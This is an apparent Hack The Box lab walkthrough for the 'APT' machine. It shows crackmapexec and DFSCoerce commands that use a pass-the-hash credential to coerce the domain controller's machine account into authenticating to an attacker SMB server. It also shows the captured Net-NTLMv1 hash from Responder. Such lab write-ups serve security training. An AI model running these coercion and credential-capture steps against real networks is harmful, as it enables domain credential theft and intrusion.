NTLM Relay via MSRPC netdfs


Another solution to invoke a SYSTEM level Net-NTLMv1 authentication to an attacker controlled SMB server This can be done as any regular domain user without elevating privileges to the henry.vinson_adm user

testing


┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ crackmapexec smb apt.htb.local -d HTB.LOCAL -u henry.vinson -H 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -M dfscoerce
SMB         apt.htb.local   445    APT              [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB         apt.htb.local   445    APT              [+] HTB.LOCAL\henry.vinson:e53d87d42adaa3ca32bdb34a876cbffb 
DFSCOERC... apt.htb.local   445    APT              VULNERABLE
DFSCOERC... apt.htb.local   445    APT              Next step: https://github.com/Wh04m1001/DFSCoerce

DFSCoerce


┌──(kali㉿kali)-[~/…/htb/labs/apt/DFSCoerce]
└─$ python3 dfscoerce.py 10.10.16.8 $ipv6 -d htb.local -u henry.vinson -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip $IPv6 -target-ip $IPv6
[-] connecting to ncacn_np:dead:beef::b885:d62a:d679:573f[\PIPE\netdfs]
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot 
servername:                      '10.10.16.8\x00' 
rootshare:                       'test\x00' 
apiflags:                        1 
 
 
dcerpc runtime error: code: 0x5 - rpc_s_access_denied 

Done

[smb] ntlmv1 client   : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash     : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788

on Responder

Moving on to cracking